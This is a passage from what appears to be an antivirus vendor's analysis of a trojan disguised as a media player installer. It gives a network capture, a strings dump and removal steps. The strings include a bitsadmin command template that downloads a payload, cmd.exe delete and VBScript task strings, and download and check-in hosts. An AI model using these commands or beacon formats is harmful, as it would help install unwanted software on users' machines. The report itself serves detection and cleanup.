SVW.}[email protected]@.P..hq@........`........V......SP.......Pp@..
..W..;.}[email protected][email protected]...
@..4.......P...p@......./ub......<Tt"<Wt.<tt.<wuL......P..
...u>.......6......P.....~(......:u....~....P......P......P........
[email protected]@[email protected];[email protected].
[email protected]@........u....M._..^3.[.........V..W3.h..
[email protected].....<[email protected]

<<< skipped >>>

GET /down/kabo/apps.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: bumpacpacba.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.45
Content-Type: text/html
Content-Length: 32
Date: Thu, 10 Dec 2015 04:50:04 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: close
EDkh679oKhVnvEc2tJ4F2hCvvh3Af0tl..


The Trojan connects to the servers at the following location(s):

MediaPlayer__15159_il35679.exe_1884:

.text
`.rdata
@.data
.rsrc
@.reloc
109 9 59
17 85 54 84 79 51 17 115
19 89 52 85 120 58 58 67 63
18 116 19 2 9 120 49 92 54
18 121 28
18 85 46 117 120
18 85 46 97 82 46 48 92
25 95 59 85 114 53 58 94 27
25 95 59 85 114 53 58 94 13
59 68 62 93 87 120 49 92 54
59 67 54 94 84 61 32 64
58 92 63 2 9 120 49 92 54
7 85 59 85 125 63 57 85
7 85 54 84 90 37 48 116 25
38 66 44
0 99 31 99 8 100 123 84 54 93
2 66 51 69 94 16 60 92 63
34 66 49 66 79
GetProcessWindowStation
operator
KERNEL32.dll
USER32.dll
ole32.dll
RegCloseKey
RegOpenKeyW
ADVAPI32.dll
GetProcessHeap
GetCPInfo
0NÙ2n:
~S%uga
{.OC]]
5q.DW
9N%uE
~S%ua
3.kj=
s'.kC
#^.BA
}`.GQ
~BL<R%X
.AweI
bNzg .Gf?
%9sfkh,A
%9sfkh,_
U.ji'
%ssP{
%SI8{n
yp{.nf
K.kXhgw?j6ww
0>.Aq
.GQ<B0
C%uv(R
l.OC0
II.sf
Q_.zhA
%Sx\h
E%x$M
F%xlN
%UeAW
.GVTL(
7Z.Es&X
G.Se(
.kbE D~*Z$
RM%Cq
..HaM
%X%hbM
.CQ}k
e^/%d&
~0.ad$
}~2^</4_
%UuL*
.hp%(
-mSQl
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
103 60 97
109 37 20
112 59 96
116 44 119 94 116 115 98
26 1 94 107 93 86 73 23
116 12 87 126 116 83 66
119 52 113 94
@mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe

MediaPlayer__15159_il35679.exe_1884_rwx_00B20000_0008C000:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
PSShd'
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
2Ub46wAG7ILlcuNK7PAECPiT5WjjR/rwABTCpMxN+Ezw6yEC7JTQUOR12+cHC/GV3E3Wevb6Gwu+odZT7kzs7A==
w1ra8xAl65PNUORq9voUDPuD
2Uzw+zML+a7NWudk++wEBvmC7g==
xkbx9B4J+cffUPgJ7u0YBPuUylr5CertEgK+iN8fr02kvwcG7ILXS/kJ7fYNAr7C3ROqWfvxEw7wgJlM41P7v1IDlA==
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
yX3/7Bw0/Y/cW/9F+9cWCfqL3E2wE93tEgbqgvBR+V3/8xsz/5TSH8xI9/NXE/HH2FvuCertHgD5gssFqgzmlQ==
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()*+,-./0123
cousins.epoxied.1 = s 'Inst Class'
CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'
cousins.epoxied = s 'Inst Class'
CurVer = s 'cousins.epoxied.1'
ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'
ProgID = s 'cousins.epoxied.1'
VersionIndependentProgID = s 'cousins.epoxied'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalled
Created by MIDL version 7.00.0555 at Wed Dec 09 15:16:39 2015
0
0I0Y0v0
0*0*12181
)01070>0
? ?(?0?8?
9 9<9@9`9
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%d.%d.%d.%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.55
setup.exe
download-way.com


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    msconfig.exe:656
    %original file name%.exe:228
    irsetup.exe:188
    irsetup.exe:1668
    chromeupdate.exe:1820

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
    %Program Files%\Your Product\lua5.1.dll (2902 bytes)
    %Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
    %Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
    %Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
    %Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Program Files%\Your Product\uninstall.exe (9213 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
    %Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
